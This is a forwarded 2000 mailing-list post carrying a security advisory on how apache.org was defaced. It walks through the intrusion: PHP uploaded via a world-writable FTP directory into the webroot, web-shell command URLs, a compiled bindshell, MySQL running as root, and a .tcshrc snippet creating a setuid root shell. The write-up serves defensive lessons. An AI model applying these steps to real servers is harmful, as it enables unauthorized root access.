[iwar] FW: [NEWS] How apache.org was defaced
From: Robert W. Miller
From: snooker@iex.net
To: iwar@egroups.com
Tue, 9 May 2000 07:41:24 -0600
fc Tue May 9 06:47:14 2000
Received: from 207.222.214.225
by localhost with POP3 (fetchmail-5.1.0)
for fc@localhost (single-drop); Tue, 09 May 2000 06:47:14 -0700 (PDT)
Received: by multi33.netcomi.com for fc
(with Netcom Interactive pop3d (v1.21.1 1998/05/07) Tue May 9 13:47:07 2000)
X-From_: sentto-279987-334-fc=all.net@returns.onelist.com Tue May 9 08:46:30 2000
Received: from hi.egroups.com (hi.egroups.com [208.50.144.89]) by multi33.netcomi.com (8.8.5/8.7.4) with SMTP id IAA12586 for ; Tue, 9 May 2000 08:46:30 -0500
X-eGroups-Return: sentto-279987-334-fc=all.net@returns.onelist.com
Received: from [10.1.10.37] by hi.egroups.com with NNFMP; 09 May 2000 13:46:36 -0000
Received: (qmail 27796 invoked from network); 9 May 2000 13:41:41 -0000
Received: from unknown (10.1.10.142) by m3.onelist.org with QMQP; 9 May 2000 13:41:41 -0000
Received: from unknown (HELO mail.iex.net) (192.156.196.5) by mta3 with SMTP; 9 May 2000 13:41:36 -0000
Received: from oemcomputer (p88-s8.cos1-ras.iex.net [209.151.65.184]) by mail.iex.net (8.9.1/8.9.1) with SMTP id HAA00687 for ; Tue, 9 May 2000 07:31:19 -0600 (MDT)
To:
Message-ID:
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
From: "Robert W. Miller"
MIME-Version: 1.0
Mailing-List: list iwar@egroups.com; contact iwar-owner@egroups.com
Delivered-To: mailing list iwar@egroups.com
Precedence: bulk
List-Unsubscribe:
Date: Tue, 9 May 2000 07:41:24 -0600
Reply-To: iwar@egroups.com
Subject: [iwar] FW: [NEWS] How apache.org was defaced
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
The following security advisory is sent to the securiteam mailing
list, and can be found at the SecuriTeam web site:
http://www.securiteam.com
How apache.org was defaced
--------------------------
SUMMARY
Although this article does not discuss any new vulnerability, it is
very
important to read and understand the common configuration errors,
which
were made by the experienced people on apache.org.
These mistakes allowed apache.org to be compromised, but the attack
was
performed by 'gray-hat' hackers, and therefore no damage was caused.
There are two important lessons to be learned:
1. Nobody is safe from configuration mistakes. If the developers of
the
apache web server, the most popular web server on the net, made
trivial
configuration mistakes which allowed their web site to be compromised,
this could happen to anyone.
2. Don't trust anything you download off the Internet. If malicious
attackers would have compromised apache.org, the source code of this
popular web server could have easily been modified to allow some kind
of
'back-door' access to the attackers.
Therefore the recommended practice is to only download
cryptographically
signed binaries or source code, and to verify those signatures to make
sure they're authentic.
DETAILS
This article describes how, over the course of a week, a group of
hackers
succeeded in getting root access to the machine running
www.apache.org,
and changed the main page to show a 'Powered by Microsoft BackOffice'
logo
instead of the default 'Powered by Apache' logo (the feather). No
other
changes were made, except to prevent other people getting in.
(A mirrored version of apache.org's defaced site can be found at:
http://www.attrition.org/mirror/attrition/2000/05/03/www.apache.org)
Note that the problems described in this paper are not apache-related;
these were all configuration errors (one of them is taken straight
from
BugZilla's README).
The vulnerability:
The directory structure under the FTP server ftp.apache.org made it
possible to upload files into a path that is mapped to the apache web
server. This made it possible to upload PHP files into the FTP server,
and
then execute them from the web.
By using the following wuh.php3 script:
It was possible to create a "Trojan" like PHP on the remote server:
This
script makes it possible to execute shell commands remotely, by
passing
them as parameters to this PHP script.
For example, it was possible to execute the command 'id' by calling
the
special script as follows:
http://www.apache.org/thatdir/wuh.php3?cmd=id
Clearly, these shell commands run under the web server user's
permissions.
While it is typically possible to gain root access from a normal user
account (using one of the buffer overflow vulnerabilities or other
exploits that are usually available on our
exploits page), our hackers
wanted
to gain root access with only configuration vulnerabilities.
Next some bindshell was uploaded to the same directory and compiled
(this
was just as easy as using 'id'):
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c
After it the program was compiled, it was executed:
http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
This gives complete shell access from remote.
This bindshell code allows telneting to a special unprivileged port
(it
was set to respond to TCP port 65533) and provided local shell access
with
the 'nobody' account access rights (the account apache runs under).
After local access has been obtained, a higher level of access rights
were
needed, namely root. After searching for the 'right' vulnerable
application, MySQL was chosen. This is because MySQL runs as user
root,
and because it was reachable locally. Apache.org are running bugzilla,
which requires a MySQL account, and since MySQL has its username and
password written in plaintext in the bugzilla source it was easy to
get a
username/password pair for the MySQL database.
Using a program called nportredird, the server can now accept
connections
on port 23306 and redirect them to the localhost port 3306 - enabling
the
usage of a specially built MySQL client.
Having gained access to localhost port 3306, and using the login
'bugs'
(which had full access [as in "all Y's"]), our attacker's privileges
were
elevated substantially. This was mostly due to sloppy reading of the
BugZilla README on behalf on the apache.org system administrator. The
README does show a quick way to set things up (with all Y's) but also
has
a lot of security warnings, including "don't run mysqld as root".
Using 'SELECT ... INTO OUTFILE;' it was possible to create files
anywhere,
as root. These files were mode 666, but the MySQL server did not
overwrite
existing files, so another approach was called for.
A Trojan-like trick was used. A database called 'test' was created
with a
one-column table with an 80-character text field. A couple of inserts
and
one select later, a /root/.tcshrc was created with contents similar
to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
Quite trivial. Now it was just a matter of time until someone 'su -'.
Luckily, with 9 people legally having root, this didn't take long. The
rest is trivial too - being root defacing the site was easy, but not
until
after a short report listing the vulnerabilities and quick fixes was
built. Shortly after defacing the site, the attackers sent this report
to
one of the administrators.
In short:
The vulnerabilities were due to:
- Ftproot==webroot, world-writable directories allowing uploading and
execution of php3 scripts.
- Mysqld running as root, with a FULL RIGHTS login without a
password.
ADDITIONAL INFORMATION
Information has been provided by: Peter
van
Dijk.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email
to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty
of any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits
or special damages.
Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker@iex.net
mailto:cicactf@iex.net
http://www.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net
------------------------------------------------------------------------
Was the salesman clueless? Productopia has the answers.
http://click.egroups.com/1/3019/11/_/595019/_/957879995/
------------------------------------------------------------------------
------------------
http://all.net/